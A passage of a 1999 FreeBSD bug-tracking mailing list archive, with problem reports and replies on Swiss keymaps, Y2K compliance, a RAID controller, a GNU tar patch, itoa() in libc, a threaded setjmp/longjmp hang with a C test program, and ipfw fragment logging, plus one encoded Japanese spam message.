-0800 (PST) From: mb@imp.ch To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/14667: [FIX] wrong swissgerman/swissfrench ISO-keymaps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14667 >Category: conf >Synopsis: [FIX] wrong swissgerman/swissfrench ISO-keymaps >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 2 15:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Blapp Martin >Release: All FreeBSD >Organization: Improware AG >Environment: STABLE / CURRENT >Description: The swissgerman/swissfrench iso-keymaps are completly wrong. They are cp850, not ISO_8859-1. And some key's in the old map are wrong too. >How-To-Repeat: keymap="swissgerman.iso" # keymap in /usr/share/syscons/keymaps/ font8x16="iso-8x16.fnt" # font 8x16 from /usr/share/syscons/fonts/ font8x14="iso-8x14.fnt" # font 8x14 from /usr/share/syscons/fonts/ font8x8="iso-8x8.fnt" # font 8x8 from /usr/share/syscons/fonts Use vim in cons25 and try to enter 'umlauts'. >Fix: http://www.attic.ch/keymaps.html (If you know german) else just: http://www.attic.ch/keymaps/swissgerman-1.iso.kbd http://www.attic.ch/keymaps/swissgerman-2.iso.kbd http://www.attic.ch/keymaps/swissgerman.cp850.kbd http://www.attic.ch/keymaps/swissfrench.iso.kbd http://www.attic.ch/keymaps/swissfrench.cp850.kbd I'm still testing these keymaps and I'd like that people test them. Please report any errors to me. Please contact me (mb@imp.ch) before committing them. (Yokota/SOS): Does a reference ISO-keymap exist and is there a list of the important special key's with their meaning ? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 20:36: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mail1.info.com.ph (mail.info.com.ph [203.172.11.150]) by hub.freebsd.org (Postfix) with ESMTP id 65AF814C39; Tue, 2 Nov 1999 20:35:52 -0800 (PST) (envelope-from eduardos@info.com.ph) Received: from Spring.info.com.ph ([203.172.11.117]) by mail1.info.com.ph (8.9.1a/8.9.1) with SMTP id MAA45180; Wed, 3 Nov 1999 12:39:12 +0800 Message-Id: <199911030439.MAA45180@mail1.info.com.ph> X-Sender: eduardos@mail1.info.com.ph X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0 Date: Wed, 03 Nov 1999 12:44:24 +0800 To: freebsd-questions@FreeBSD.ORG From: Jun Springael Subject: FreeBSD 2.2.1 Release Y2K Compliance Cc: freebsd-bugs@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sir/Madam, Is FreeBSD Software version 2.2.1 a Y2000 Compliant? Your immediate response is highly appreciated. Thank you. Jun Springael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 20:50:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mta2.rcsntx.swbell.net (mta2.rcsntx.swbell.net [151.164.30.26]) by hub.freebsd.org (Postfix) with ESMTP id F2FAD156F5; Tue, 2 Nov 1999 20:50:08 -0800 (PST) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org ([216.62.157.60]) by mta2.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.1999.09.16.21.57.p8) with ESMTP id <0FKL00HVWUN48Q@mta2.rcsntx.swbell.net>; Tue, 2 Nov 1999 22:47:29 -0600 (CST) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id WAA08562; Tue, 02 Nov 1999 22:48:20 -0600 (CST envelope-from chris) X-URL: http://www.FreeBSD.org/~chris/ Date: Tue, 02 Nov 1999 22:48:19 -0600 From: Chris Costello Subject: Re: FreeBSD 2.2.1 Release Y2K Compliance In-reply-to: <199911030439.MAA45180@mail1.info.com.ph> To: Jun Springael Cc: freebsd-questions@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG Reply-To: chris@calldei.com Message-id: <19991102224819.B602@holly.calldei.com> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.4i X-Operating-System: FreeBSD 4.0-CURRENT (i386) References: <199911030439.MAA45180@mail1.info.com.ph> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999, Jun Springael wrote: > Sir/Madam, > > Is FreeBSD Software version 2.2.1 a Y2000 Compliant? No. See http://www.FreeBSD.org/y2kbug.html -- |Chris Costello |Real programs don't eat cache. `---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 21:16:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.ausit.com (mail.ausit.com [203.41.163.235]) by hub.freebsd.org (Postfix) with ESMTP id 3D78E14E96 for ; Tue, 2 Nov 1999 21:16:40 -0800 (PST) (envelope-from greg@ausit.com) Received: from wk1 (sun.ausit.com [203.41.163.240]) by mail.ausit.com (8.9.3/8.7) with ESMTP id QAA15697; Wed, 3 Nov 1999 16:15:52 +1100 Message-ID: <199911031615400670.0DA68217@mail.ausit.com> In-Reply-To: <199911030439.MAA45180@mail1.info.com.ph> References: <199911030439.MAA45180@mail1.info.com.ph> X-Mailer: Calypso Version 3.00.03.02 (1) Date: Wed, 03 Nov 1999 16:15:40 +1100 From: "Greg W" To: "Jun Springael" Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: FreeBSD 2.2.1 Release Y2K Compliance Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Your message was sent to a mailing list that has many people acting as volunteers to help others, whilst your post may be ok if you were asking a pool of volunteers what they believe the y2k status of FreeBSD or other Free operating systems are It is entirely inappropriate to almost demand an immediate response to a commercial looking question, no less of volunteers for this y2k statement. I would like to suggest reading any y2k info here http://www.freebsd.org/ no offence intended, but education is ..... *********** REPLY SEPARATOR *********** On 3/11/99 at 12:44 Jun Springael wrote: >Sir/Madam, > >Is FreeBSD Software version 2.2.1 a Y2000 Compliant? > >Your immediate response is highly appreciated. > >Thank you. > > >Jun Springael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Nov 2 22:40: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C10AF14FCD for ; Tue, 2 Nov 1999 22:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA58177; Tue, 2 Nov 1999 22:40:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 6F06314F51; Tue, 2 Nov 1999 22:36:03 -0800 (PST) Message-Id: <19991103063603.6F06314F51@hub.freebsd.org> Date: Tue, 2 Nov 1999 22:36:03 -0800 (PST) From: nicolas.blanc@netcourrier.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14681: Compaq Smart Array 3200 RAID Controller not found Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14681 >Category: kern >Synopsis: Compaq Smart Array 3200 RAID Controller not found >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 2 22:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Nicolas >Release: 3.3 >Organization: STARTEL >Environment: nothing to declare ;-) >Description: I try to boot with a 3.3 kern.flp image but it can't find my Smart Array 3200 Controller, i can't even find it in the kern configuration menu. I 'm not very easy with FBSD as i WAS a BSDI user, but i'd like to go on with it.... My machine is a Compaq Proliant 3000 (PII 500 / 512 M)... Thanks in Adv >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 0:40:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 92C8F14CAB for ; Wed, 3 Nov 1999 00:40:36 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA65327; Wed, 3 Nov 1999 00:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 3 Nov 1999 00:40:01 -0800 (PST) Message-Id: <199911030840.AAA65327@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR gnu/14664; it has been noted by GNATS. From: Sheldon Hearn To: Andre Albsmeier Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Date: Wed, 03 Nov 1999 10:31:35 +0200 On Tue, 02 Nov 1999 19:49:53 +0100, Andre Albsmeier wrote: > - closeout_volume_number (); > + if (f_volno_file) > + closeout_volume_number (); If you got this change from the GNU tar maintainers, then we should probably commit it. If it's something you came up with yourself, you should report it to the GNU tar maintainers and let me know; I'll suspend your PR and wait for you to open a new one when you have something "official" from the GNU tar maintainers. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 1:40:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 850FB15554 for ; Wed, 3 Nov 1999 01:40:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA69451; Wed, 3 Nov 1999 01:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 3 Nov 1999 01:40:02 -0800 (PST) Message-Id: <199911030940.BAA69451@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR gnu/14664; it has been noted by GNATS. From: Andre Albsmeier To: Sheldon Hearn Cc: Andre Albsmeier , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Date: Wed, 3 Nov 1999 10:30:52 +0100 On Wed, 03-Nov-1999 at 10:31:35 +0200, Sheldon Hearn wrote: > > > On Tue, 02 Nov 1999 19:49:53 +0100, Andre Albsmeier wrote: > > > - closeout_volume_number (); > > + if (f_volno_file) > > + closeout_volume_number (); > > If you got this change from the GNU tar maintainers, then we should > probably commit it. If it's something you came up with yourself, you I came up with it myself. > should report it to the GNU tar maintainers and let me know; I'll > suspend your PR and wait for you to open a new one when you have > something "official" from the GNU tar maintainers. I decided to look in tar-1.12.tar.gz from a gnu site before sending mail to bug-gnu-utils and, look, here the fix can be found already: buffer.c, around line 1555: ------------------------- snip ------------------------------ if (info_script_option) { if (volno_file_option) closeout_volume_number (); system (info_script_option); } ------------------------- snap ------------------------------ The corresponding ChangeLog: ------------------------- snip ------------------------------ 1996-04-23 Fran\xe7ois Pinard ... * buffer.c (new_volume): Avoid calling closeout_volume_number if the --volno-file option was not specified, so avoiding crashes. ------------------------- snap ------------------------------ I think it would be the best to update the whole tar (since there are lots more bug fixes) but until this had been done, you could commit my fix. Thanks, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 1:40:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C193615581 for ; Wed, 3 Nov 1999 01:40:07 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA69456; Wed, 3 Nov 1999 01:40:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 3 Nov 1999 01:40:04 -0800 (PST) Message-Id: <199911030940.BAA69456@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR gnu/14664; it has been noted by GNATS. From: Sheldon Hearn To: Andre Albsmeier Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Date: Wed, 03 Nov 1999 11:37:42 +0200 On Wed, 03 Nov 1999 10:30:52 +0100, Andre Albsmeier wrote: > I think it would be the best to update the whole tar (since there are > lots more bug fixes) but until this had been done, you could commit my > fix. No, if anything is to be committed in the interrim, it should be as close to the version used by the later release of GNU tar as possible. As you said, though, I think tar will be upgraded soon. Thanks, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 1:51:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E071515588 for ; Wed, 3 Nov 1999 01:51:17 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA70065; Wed, 3 Nov 1999 01:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 3 Nov 1999 01:50:01 -0800 (PST) Message-Id: <199911030950.BAA70065@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR gnu/14664; it has been noted by GNATS. From: Andre Albsmeier To: Sheldon Hearn Cc: Andre Albsmeier , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: gnu/14664: tar checks for volno-file even if it shouldn't Date: Wed, 3 Nov 1999 10:41:43 +0100 On Wed, 03-Nov-1999 at 11:37:42 +0200, Sheldon Hearn wrote: > > > On Wed, 03 Nov 1999 10:30:52 +0100, Andre Albsmeier wrote: > > > I think it would be the best to update the whole tar (since there are > > lots more bug fixes) but until this had been done, you could commit my > > fix. > > No, if anything is to be committed in the interrim, it should be as > close to the version used by the later release of GNU tar as possible. OK. > > As you said, though, I think tar will be upgraded soon. That would be really good, I think, since I saw lots of bug fixes while looking through ChangeLog. > > Thanks, > Sheldon. Thanks to you, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 4:28:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp.mtci.ne.jp (smtp.mtci.ne.jp [210.231.230.8]) by hub.freebsd.org (Postfix) with ESMTP id C1B1114DA5 for ; Wed, 3 Nov 1999 04:28:04 -0800 (PST) (envelope-from ks_org@aax.mtci.ne.jp) Received: from smtp.mtci.ne.jp (ppp83-Kisaradu1.mtci.ne.jp [210.172.11.93]) by smtp.mtci.ne.jp (8.8.8/3.6W) with SMTP id VAA08246 for ; Wed, 3 Nov 1999 21:26:18 +0900 Date: Wed, 3 Nov 1999 21:26:18 +0900 Message-Id: <199911031226.VAA08246@smtp.mtci.ne.jp> From: =?iso-2022-jp?B?S2F6dW1pIFNhc2FraQ==?= To: =?iso-2022-jp?B?ZnJlZWJzZC1idWdzQGZyZWVic2Qub3Jn?= Subject: =?iso-2022-jp?B?GyRCJTslaSU3ITwlcz5lTiYlLSVjJXMlWiE8JXMbKEI=?= Mime-Version: 1.0 Content-Type: text/plain; charset= "ISO-2022-JP" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org $B!y!y!y(B $B%;%i%7!<%s>eN&%-%c%s%Z!<%s(B $B!y!y!y(B '99$BG/EYA4JF(BNo.1$B%;!<%k%9$r>e$2$F$$$k9q:]FC5v%5%W%j%a%s%H!"(B $B%;%i%7!<%s(B[CELLASENE]$B$,$$$h$$$h:#7nF|K\$K>eN&$7$^$9!#(B $B%;%i%7!<%s$Oc32$r5/$3$7$F$$$k$?$a!"(B $B0lEYH/@8$9$k$HHnBg2=$9$k$3$H$O$"$C$F$b!"(B $B%@%$%(%C%H$d1?F0$r9T$C$F$b!"$J$+$J$+Mn$H$;$J$$$N$,8=o$KMn$H$7$K$/$$;iKC$N$?$a!"BN=E$dBN7A$K4X$o$i$:!"(B $BLs(B90$B!s$N=w@-$,%;%k%i%$%H$K$D$$$FG:$s$G$$$k$HJs9p$5$l$F$$$^$9!#(B $B%@%$%(%C%H$NI,MW$J$5$=$&$J!"$d$;$F$$$k=w@-$,%@%$%(%C%H$r9T$&$N$O!"(B $B$3$N%;%k%i%$%H$rMn$H$7$?$$$H$$$&5$;}$A$KB>$J$j$^$;$s!#(B $B%;%i%7!<%s$O!"$3$N%;%k%i%$%H$r=|5n$9$k$?$a$K%$%?%j%"$G3+H/$5$l!"(B $BNW>28&5f$N7k2L!"%;%k%i%$%H=|5n8z2L$,3N$+$a$i$l$?@$3&M#0l$N@=IJ$G$9!#(B $B@$3&Cf$N=w@-$K@d;?$5$l$F$*$j!"A4@$3&$G:#G/(B650$BK|%;%C%H$,HNGd$5$l!"(B $B%*!<%9%H%i%j%"$G$O(B60$BK|%;%C%H$N8BDjHNGd$@$C$?$3$H$b$"$j!"(B $BGc@j$a$K$h$kK=F0$,KVH/$7$?$&$($K!"(B $B:G8e$N(B1$B%;%C%H$K$O(B12,000US$B%I%k(B($BLs(B130$BK|1_(B)$B$N%W%l%_%"$,$D$$$?(B $B%(%T%=!<%I$bJs9p$5$l$F$$$^$9!#(B $B$*6b$N$+$+$kH~MF@07A$d%(%9%F$K$+$h$&$3$H$J$/!"(B $B$o$:$+(B8$B=54V$G%R%C%W%i%$%s!$%l%C%0%i%$%s$r$-$l$$$K@0$($k(B $B:#@$3&Cf$G:G$bCmL\$5$l$F$$$k%5%W%j%a%s%H!H%;%i%7!<%s!I$K$D$$$F(B $B!&99$K>\$7$$@bL@$r$44uK>$NJ}(B $B!&@=IJ9XF~4uK>$NJ}(B $B$O2<5-(BURL$B$K@=IJ35MW!$NW>28&5f7k2L!$%*!<%@!<%U%)!<%`(B $BEy$,7G:\$5$l$F$$$^$9$N$G@'Hs$4Mw2<$5$$!#(B $B%;%i%7!<%s>\:Y>pJs(BURL http://www.dab.hi-ho.ne.jp/bios_life/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 7:20:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C61BC14D21 for ; Wed, 3 Nov 1999 07:20:45 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA49492; Wed, 3 Nov 1999 07:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 3 Nov 1999 07:20:03 -0800 (PST) Message-Id: <199911031520.HAA49492@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Pedro Fernando Giffuni" Subject: Re: misc/10325: Implementation of itoa() for libc Reply-To: "Pedro Fernando Giffuni" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/10325; it has been noted by GNATS. From: "Pedro Fernando Giffuni" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: misc/10325: Implementation of itoa() for libc Date: Wed, 03 Nov 1999 10:20:26 -0500 Actually, Under no circumstance should this go into libc. The function is not standard so it might go into libcompat. After talking this out, I'm not sure if it should be in FreeBSD at all though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 7:52:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 04B5714EE4 for ; Wed, 3 Nov 1999 07:52:30 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA52215; Wed, 3 Nov 1999 07:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id E1DA914DBD; Wed, 3 Nov 1999 07:48:46 -0800 (PST) Message-Id: <19991103154846.E1DA914DBD@hub.freebsd.org> Date: Wed, 3 Nov 1999 07:48:46 -0800 (PST) From: xfb52@dial.pipex.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14685: setjmp/longjmp in threaded app cause subsequent read to run forever Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14685 >Category: kern >Synopsis: setjmp/longjmp in threaded app cause subsequent read to run forever >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 07:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alex Zbyslaw >Release: 3.2 >Organization: >Environment: FreeBSD stimpy 3.2-RELEASE FreeBSD 3.2-RELEASE #3: Tue Oct 26 19:23:46 BST 1999 alex@stimpy:/usr/src/sys/compile/SHERPA i386 >Description: If a program linked against libc_r is looping on a read, the read is interrupted, and the signal handler uses a longjmp to jump back to just before the read, the read call will go into an infinite loop. As far as I have trace it, everything goes wrong somewhere in _thread_kern_poll This is a big problem (for me) as this is exactly how python interacts libreadline. >How-To-Repeat: Compile the following program e.g. gcc -pthread -o readtest readtest.c Type a few keys to see that it is working OK, and then press ^C. I used ktrace/kdump -l to watch what happened when keys were pressed and when ^C was pressed. After a keypress the process ends up doing a gettimeofday() and then a poll() but after a ^C it does the gettimeofday() but never reaches a poll. top shows it in a RUN state chewing up mucho CPU. #include #include #include #include #include #include #include extern int errno; static jmp_buf jbuf; void onintr() { printf("\nCAUGHT INT\n"); longjmp(jbuf, 1); } int main (argc, argv) int argc; char **argv; { unsigned char c; int result; int flags; struct termios tio; struct sigaction act; act.sa_handler = onintr; act.sa_mask = SIGINT; act.sa_flags = 0; sigaction(SIGINT, &act, NULL); tcgetattr(fileno(stdin), &tio); tio.c_lflag &= ~(ICANON); tcsetattr(fileno(stdin), TCSANOW, &tio); while (1) { if (setjmp(jbuf)) { printf("\nIN SETJMP\n"); } result = read(fileno(stdin), &c, sizeof(unsigned char)); if (result == 0 || c == 4) { printf ("\nEOF\n"); exit (0); } if (result == sizeof(unsigned char)) { printf ("\nREAD: %c\n", c); continue; } printf ("\nERROR: %s\n", strerror(errno)); } } >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 7:52:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mta1.rcsntx.swbell.net (mta1.rcsntx.swbell.net [151.164.30.25]) by hub.freebsd.org (Postfix) with ESMTP id 682E4155E6 for ; Wed, 3 Nov 1999 07:52:38 -0800 (PST) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org ([216.62.157.60]) by mta1.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.1999.09.16.21.57.p8) with ESMTP id <0FKM00CIAP9JAY@mta1.rcsntx.swbell.net> for freebsd-bugs@FreeBSD.ORG; Wed, 3 Nov 1999 09:48:56 -0600 (CST) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id JAA10193; Wed, 03 Nov 1999 09:48:24 -0600 (CST envelope-from chris) X-URL: http://www.FreeBSD.org/~chris/ Date: Wed, 03 Nov 1999 09:48:23 -0600 From: Chris Costello Subject: Re: misc/10325: Implementation of itoa() for libc In-reply-to: <199911031520.HAA49492@freefall.freebsd.org> To: Pedro Fernando Giffuni Cc: freebsd-bugs@FreeBSD.ORG Reply-To: chris@calldei.com Message-id: <19991103094823.H602@holly.calldei.com> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.4i X-Operating-System: FreeBSD 4.0-CURRENT (i386) References: <199911031520.HAA49492@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999, Pedro Fernando Giffuni wrote: > Actually, > > Under no circumstance should this go into libc. The function is not > standard so it might go into libcompat. After talking this out, I'm not > sure if it should be in FreeBSD at all though. I agree. I see absolutely no point in itoa in an operating system where sprintf/printf exist. -- |Chris Costello |What do computer engineers use for birth control? Their personalities. `----------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 10: 1:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ECB3714DD0 for ; Wed, 3 Nov 1999 10:01:28 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA68063; Wed, 3 Nov 1999 10:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from monkeys.com (i180.value.net [206.14.136.180]) by hub.freebsd.org (Postfix) with ESMTP id 8EF52158D7 for ; Wed, 3 Nov 1999 09:55:48 -0800 (PST) (envelope-from rfg@monkeys.com) Received: (from rfg@localhost) by monkeys.com (8.9.3/8.9.3) id JAA11229; Wed, 3 Nov 1999 09:54:50 -0800 (PST) Message-Id: <199911031754.JAA11229@monkeys.com> Date: Wed, 3 Nov 1999 09:54:50 -0800 (PST) From: "Ronald F. Guilmette" Reply-To: rfg@monkeys.com (Ronald F. Guilmette) To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/14688: kernel firewall code doesn't log port #'s for `Fragment's Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14688 >Category: kern >Synopsis: kernel firewall code doesn't log port #'s for `Fragment's >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 10:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ronald F. Guilmette >Release: FreeBSD 3.3-RELEASE i386 >Organization: E-Scrub Technologies, Inc. >Environment: >Description: A kernel that has been built with the IPFIREWALL option can be instructed to log instances of incoming packet fragments. When it is so configured, the kernel will dutifully log such packets, however the entries it writes to the syslog for such packets, while including the sources and destination IP addresses fail to also include the source and destination port numbers. The port numbner information may be helpful in various circum- stances, and should be included in the relevant log records. >How-To-Repeat: Configure a kernel with `option IPFIREWALL'. Built it. Install it. Then reboot. Insure that kernel logging messages are logged to either a file or to /dev/console by adding an appropriate entry to the local /etc/syslog.conf file. Restart or reinitialize syslogd. Then execute the following command (as root): ipfw add 30000 deny log tcp from any to any frag Then arrange to send some packet fragments to the system in question and look at the resulting log entries. >Fix: Modify the code for the IPPROTO_TCP & IPPROTO_UDP cases of the switch() statement beginning at line 363 of /usr/src/sys/netinet/ip_fw.c so that the port number is always printed, even if the value of the subexpression (ip->ip_off & IP_OFFMASK) is non-zero. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 11:40:22 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E7FAA150D0 for ; Wed, 3 Nov 1999 11:40:19 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA79805; Wed, 3 Nov 1999 11:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 415A11502E; Wed, 3 Nov 1999 11:38:18 -0800 (PST) Message-Id: <19991103193818.415A11502E@hub.freebsd.org> Date: Wed, 3 Nov 1999 11:38:18 -0800 (PST) From: wpk@isc.org To: freebsd-gnats-submit@freebsd.org 